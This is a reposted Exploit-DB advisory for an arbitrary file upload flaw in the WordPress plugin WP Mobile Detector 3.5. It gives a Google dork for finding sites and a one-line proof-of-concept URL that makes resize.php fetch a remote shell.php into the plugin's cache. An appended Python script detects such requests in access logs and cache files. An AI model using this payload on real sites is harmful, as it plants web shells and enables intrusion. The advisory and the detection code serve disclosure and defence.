Exploit WordPress Plugin WP Mobile Detector 3.5 - Arbitrary File Upload

Exploiter

18 Dec 2022
EDB-ID: 39891
EDB verification: Passed
Author: AADITYA PURANI
Vulnerability type: WEBAPPS
Platform: PHP
CVE: N/A
Publication date: 2016-06-06
Code:
#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
#Date: 1-06-2015
#Exploit Author: Aaditya Purani
#Author Details: https://aadityapurani.com
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
#Version: 3.5
#Tested on: Kali Linux 2.0 Sana / Windows 10


This vulnerability, an arbitrary file upload in WP Mobile Detector
version <=3.5, was disclosed to the public yesterday. An attacker can
upload malicious PHP files (shell) to the website. Over 10,000 users are
affected. The vendor has released a patch in versions 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .

I have written a complete POC post:

https://aadityapurani.com/2016/06/03/mobile-detector-poc/

I have made a POC video here:
https://www.youtube.com/watch?v=ULE1AVWfHTU

Simple POC:

Go to: 

[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]

and it will get saved in directory:

/wp-content/plugins/wp-mobile-detector/cache/shell.php
 
Source
www.exploit-db.com
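
A detection check for the behaviour described above, added here as an example (it is not part of the original advisory or the plugin). It flags access-log requests that pass a script URL to `resize.php` or request a script from the plugin's `cache/` directory, and lists script files already present in that directory. Assumptions: a combined-format access log, the extension list in `SCRIPT_EXT`, and the constructed sample log lines.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit, parse_qs

PLUGIN = "/wp-content/plugins/wp-mobile-detector/"
# Assumption: extensions this web server hands to the PHP interpreter.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")
# client address, request target and status from a combined-format log line
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def scan_access_log(lines):
    """Return (client, kind, detail, status) for requests matching the advisory."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        path = url.path.lower()
        if path.endswith(PLUGIN + "resize.php"):
            # parse_qs percent-decodes, so an encoded src value is still seen
            for src in parse_qs(url.query).get("src", []):
                if urlsplit(src).path.lower().endswith(SCRIPT_EXT):
                    hits.append((client, "script-fetch", src, status))
        elif PLUGIN + "cache/" in path and path.endswith(SCRIPT_EXT):
            hits.append((client, "cache-script-request", url.path, status))
    return hits

def scripts_in_cache(wp_root):
    """List script files sitting in the plugin's cache directory."""
    cache = Path(wp_root) / PLUGIN.strip("/") / "cache"
    if not cache.is_dir():
        return []
    return sorted(p.name for p in cache.iterdir() if p.suffix.lower() in SCRIPT_EXT)

# Constructed sample lines (documentation addresses, invented hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jun/2016:10:00:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http%3A%2F%2Fhost.invalid%2Fshell.php HTTP/1.1" 200 0',
    '198.51.100.4 - - [06/Jun/2016:10:00:05 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://blog.example/a.jpg HTTP/1.1" 200 900',
    '203.0.113.7 - - [06/Jun/2016:10:00:09 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/shell.php HTTP/1.1" 200 88',
    '198.51.100.4 - - [06/Jun/2016:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A `cache-script-request` hit with a 200 status, or any name returned by `scripts_in_cache`, means a script is already on disk and the site should be treated as compromised, not just probed.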
